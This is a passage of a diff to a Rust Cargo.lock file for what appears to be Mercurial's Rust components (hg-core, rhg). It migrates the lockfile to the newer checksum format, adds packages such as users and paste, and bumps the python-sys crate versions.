(registry+https://github.com/rust-lang/crates.io-index)", - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "adler", + "autocfg", +] + +[[package]] +name = "num-integer" +version = "0.1.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" +dependencies = [ + "autocfg", + "num-traits", ] [[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "num_cpus" version = "1.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", ] [[package]] name = "output_vt100" version = "0.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", +] + +[[package]] +name = "paste" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880" +dependencies = [ + "paste-impl", + "proc-macro-hack", +] + +[[package]] +name = "paste-impl" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6" +dependencies = [ + "proc-macro-hack", ] [[package]] name = "pkg-config" version = "0.3.19" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" [[package]] name = "ppv-lite86" version = "0.2.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" [[package]] name = "pretty_assertions" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)", - "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "ctor", + "difference", + "output_vt100", ] [[package]] name = "proc-macro-hack" version = "0.5.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" [[package]] name = "proc-macro2" version = "1.0.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" dependencies = [ - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-xid", ] [[package]] name = "python27-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "python3-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "quick-error" version = "1.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" [[package]] name = "quote" version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", ] [[package]] name = "rand" version = "0.3.23" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "rand 0.4.6", ] [[package]] name = "rand" version = "0.4.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" dependencies = [ - "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "fuchsia-cprng", + "libc", + "rand_core 0.3.1", + "rdrand", + "winapi", ] [[package]] name = "rand" version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" dependencies = [ - 
"getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", + "libc", + "rand_chacha", + "rand_core 0.5.1", + "rand_hc", ] [[package]] name = "rand_chacha" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" dependencies = [ - "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "ppv-lite86", + "rand_core 0.5.1", ] [[package]] name = "rand_core" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" dependencies = [ - "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.4.2", ] [[package]] name = "rand_core" version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" [[package]] name = "rand_core" version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", ] [[package]] name = "rand_distr" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" dependencies = [ - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", + "rand 0.7.3", ] [[package]] name = 
"rand_hc" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_pcg" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_xoshiro" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rayon" version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "crossbeam-deque", + "either", + "rayon-core", ] [[package]] name = "rayon-core" version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" dependencies = [ - "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 
(registry+https://github.com/rust-lang/crates.io-index)", - "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.5.0", + "crossbeam-deque", + "crossbeam-utils 0.8.1", + "lazy_static", + "num_cpus", ] [[package]] name = "rdrand" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" dependencies = [ - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.3.1", ] [[package]] name = "redox_syscall" version = "0.1.57" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "regex" version = "1.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" dependencies = [ - "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)", - "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "aho-corasick", + "memchr", + "regex-syntax", + "thread_local", ] [[package]] name = "regex-syntax" version = "0.6.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" [[package]] name = "remove_dir_all" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "rhg" version = "0.1.0" dependencies = [ - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 
(registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "chrono", + "clap", + "derive_more", + "env_logger", + "format-bytes", + "hg-core", + "lazy_static", + "log", + "micro-timer", + "regex", + "users", ] [[package]] name = "rust-crypto" version = "0.2.36" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" dependencies = [ - "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)", - "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "gcc", + "libc", + "rand 0.3.23", + "rustc-serialize", + "time", ] [[package]] name = "rustc-serialize" version = "0.3.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" [[package]] name = "same-file" version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "scopeguard" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "sized-chunks" version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "typenum", ] [[package]] name = "static_assertions" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" [[package]] name = "strsim" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "syn" version = "1.0.54" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "unicode-xid", ] [[package]] name = "tempfile" version = "3.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)", - "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "rand 0.7.3", + "redox_syscall", + "remove_dir_all", + "winapi", ] [[package]] name = "termcolor" version = "1.1.2" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "textwrap" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" dependencies = [ - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-width", ] [[package]] name = "thread_local" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" dependencies = [ - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "lazy_static", ] [[package]] name = "time" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", + "winapi", ] [[package]] name = "twox-hash" version = "1.6.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "rand 0.7.3", + "static_assertions", ] [[package]] name = "typenum" version = "1.12.0" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" [[package]] name = "unicode-width" version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" [[package]] name = "unicode-xid" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" + +[[package]] +name = "users" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" +dependencies = [ + "libc", + "log", +] [[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" [[package]] name = "vec_map" version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" [[package]] name = "wasi" version = "0.9.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" dependencies = [ - 
"winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", ] [[package]] name = "winapi-i686-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" [[package]] name = "winapi-util" version = "0.1.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "winapi-x86_64-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "zstd" version = "0.5.3+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" dependencies = [ - "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "zstd-safe", ] [[package]] name = "zstd-safe" version = "2.0.5+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "zstd-sys", ] [[package]] name = "zstd-sys" version = "1.4.17+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", 
- "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "glob", + "itertools", + "libc", ] - -[metadata] -"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" -"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" -"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" -"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" -"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" -"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" -"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" -"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" -"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" -"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" -"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" -"checksum clap 2.33.3 
(registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" -"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" -"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" -"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" -"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" -"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" -"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" -"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" -"checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" -"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" -"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" -"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" -"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" 
-"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" -"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790" -"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc" -"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" -"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" -"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" -"checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" -"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35" -"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" -"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" -"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" -"checksum 
jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" -"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" -"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" -"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" -"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" -"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" -"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" -"checksum memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" -"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" -"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" -"checksum micro-timer-macros 